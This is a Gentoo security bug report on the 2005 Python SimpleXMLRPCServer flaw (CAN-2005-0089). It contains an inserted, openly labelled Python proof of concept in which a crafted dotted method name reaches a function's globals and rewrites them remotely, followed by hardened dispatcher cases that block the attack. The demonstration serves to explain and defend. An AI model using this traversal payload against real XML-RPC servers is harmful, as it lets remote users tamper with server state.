Bug 80094 - dev-lang/python CAN-2005-0089 (Vendor-Sec)
Summary: dev-lang/python CAN-2005-0089 (Vendor-Sec)
Status: RESOLVED DUPLICATE of bug 80592
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All
OS: All
Importance: High normal
Assignee: Gentoo Security
Whiteboard: A2? [upstream] / CLASSIFIED 20050203
Reported: 2005-01-30 09:27 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2008-04-23 08:11 UTC

Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-30 09:27:27 UTC
The Python folks have discovered a flaw in SimpleXMLRPCServer that can affect any XML-RPC servers. This affects any programs that have been written to allow remote untrusted users to do unrestricted traversal, and can allow them to access or change function internals using the im_* and func_* attributes.
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-30 09:28:59 UTC
2.3.5 will be released soon to fix this problem.
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-30 22:24:28 UTC
The exploit only works when register_instance() is called with an instance that does not implement _dispatch(). XML-RPC servers that use register_function() instead of register_instance() are not vulnerable. Unfortunately most XML-RPC tutorials use register_instance() without pointing out the recursive traversal feature.
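The traversal described in the comments above, as an added example that is not part of this bug report or of Python's own code. The vulnerable resolver below is a reconstruction written for this example (a plain getattr chain over the dotted method name with no check on private names), not the original SimpleXMLRPCServer source; the Python 3 attributes __func__ and __globals__ stand in for the Python 2 im_func and func_globals named in the description. The Calculator service, the LIMIT global and the in-process dispatch helper are made up for the demonstration. The hardened cases run against the stock Python 3 dispatcher, which refuses dotted names unless register_instance() is given allow_dotted_names=True and rejects any component beginning with an underscore, and against register_function(), which the comment above identifies as the safe registration path.

```python
"""XML-RPC dotted-name traversal through register_instance(), shown without a
socket by feeding marshalled requests straight into the dispatcher.

Added example, not from the Gentoo bug or from Python. The unrestricted
resolver is a reconstruction of the vulnerable behaviour, not the 2.3.4 code.
"""
import xmlrpc.client
from xmlrpc.server import SimpleXMLRPCDispatcher

LIMIT = 10  # constructed module global, reachable through add.__func__.__globals__


class Calculator:
    """Service object with no _dispatch(): the pattern the comment warns about."""

    def add(self, a, b):
        return min(a + b, LIMIT)


def resolve_unrestricted(obj, name):
    """Reconstruction of the vulnerable resolver: split the XML-RPC method name
    on '.' and follow every component with getattr, private names included."""
    for part in name.split("."):
        obj = getattr(obj, part)
    return obj


class UnrestrictedDispatcher(SimpleXMLRPCDispatcher):
    """Dispatcher whose _dispatch() uses the unrestricted resolver (vulnerable)."""

    def _dispatch(self, method, params):
        return resolve_unrestricted(self.instance, method)(*params)


def call(dispatcher, method, *params):
    """One XML-RPC round trip in-process: marshal the request, run it through
    _marshaled_dispatch(), unmarshal the reply. Returns the result value, or
    a 'fault: ...' string if the server answered with a Fault."""
    request = xmlrpc.client.dumps(params, methodname=method)
    response = dispatcher._marshaled_dispatch(request)
    try:
        (value,), _ = xmlrpc.client.loads(response)
        return value
    except xmlrpc.client.Fault as fault:
        return "fault: " + fault.faultString


ATTACK = "add.__func__.__globals__.update"  # add -> function -> module dict -> update


def exploit_unrestricted():
    """The remote caller names a path into the method's internals and rewrites
    a module global. Returns (result before, result after) for add(7, 8)."""
    global LIMIT
    LIMIT = 10
    d = UnrestrictedDispatcher(allow_none=True)
    d.register_instance(Calculator())
    before = call(d, "add", 7, 8)            # 10: clamped by LIMIT
    call(d, ATTACK, {"LIMIT": 0})            # dict.update() on the module globals
    after = call(d, "add", 7, 8)             # 0: LIMIT was changed over XML-RPC
    return before, after


def hardened_results():
    """Same attack against the stock dispatcher, three ways it is stopped."""
    global LIMIT
    LIMIT = 10
    results = {}
    # (a) register_instance() with the default allow_dotted_names=False: the
    #     whole string is looked up as a single attribute and does not exist.
    d = SimpleXMLRPCDispatcher(allow_none=True)
    d.register_instance(Calculator())
    results["default"] = call(d, ATTACK, {"LIMIT": 0})
    # (b) dotted names allowed, but any component starting with '_' is refused.
    d = SimpleXMLRPCDispatcher(allow_none=True)
    d.register_instance(Calculator(), allow_dotted_names=True)
    results["dotted"] = call(d, ATTACK, {"LIMIT": 0})
    # (c) register_function(): only the listed name exists, nothing to walk.
    d = SimpleXMLRPCDispatcher(allow_none=True)
    d.register_function(Calculator().add, "add")
    results["function"] = call(d, ATTACK, {"LIMIT": 0})
    results["limit"] = LIMIT                 # untouched: 10
    results["add"] = call(d, "add", 7, 8)    # still 10
    return results


if __name__ == "__main__":
    print("vulnerable resolver, add(7, 8) before/after:", exploit_unrestricted())
    for name, value in hardened_results().items():
        print(f"hardened [{name}]: {value}")
```

The attack string is an ordinary XML-RPC methodName, so nothing on the wire looks unusual: the only defence is the server refusing to walk it. Note that in the vulnerable case the side effect lands even if the final call's return value cannot be marshalled back to the client (here allow_none=True is set only so the update() result is visible); a server that audits its registered instance for a _dispatch() method, or that uses register_function(), removes the path entirely.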
Comment 3 Thierry Carrez (RETIRED) gentoo-dev 2005-02-03 02:59:00 UTC
Embargo until 1600 UTC today.
See advisory and patches @
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-02-03 08:45:47 UTC
Now public on bug 80592

*** This bug has been marked as a duplicate of 80592 ***